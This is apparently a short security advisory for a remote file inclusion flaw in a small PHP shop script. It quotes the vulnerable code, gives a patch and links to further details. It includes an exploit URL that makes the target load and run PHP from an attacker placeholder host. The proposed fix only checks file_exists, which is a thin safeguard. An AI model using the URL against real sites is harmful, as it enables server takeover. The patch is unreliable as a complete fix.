Informations :
°°°°°°°°°°°°°°
Version : 1.0b
Website : http://www.mapetite-entreprise.com
Problem : Include file

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
modeles/haut.php :
-----------------------------------------------------------
<?
$langfile = $dirroot."/lang/".$SESSION["lang"]."/lang.php";
require ($langfile);
?>
[...]
-----------------------------------------------------------

Exploit :
°°°°°°°°°
http://[target]/modeles/haut.php?dirroot=http://[attacker]&SESSION=.
with :
http://[attacker]/lang/lang.php

Patch :
°°°°°°°
In modeles/haut.php replace the lines :
-----------------------------------------------------------
<?
$langfile = $dirroot."/lang/".$SESSION["lang"]."/lang.php";
require ($langfile);
?>
-----------------------------------------------------------
by :
-----------------------------------------------------------
<?
$langfile = $dirroot."/lang/".$SESSION["lang"]."/lang.php";
if (file_exists($langfile)){
require ($langfile);
}
?>
-----------------------------------------------------------

A patch can be found on http://www.phpsecure.org

More details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/PEEL.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2F
tutos%2FPEEL.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_t
ools

frog-m@n

_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis !
http://www.msn.fr/msger/default.asp

[ reply ]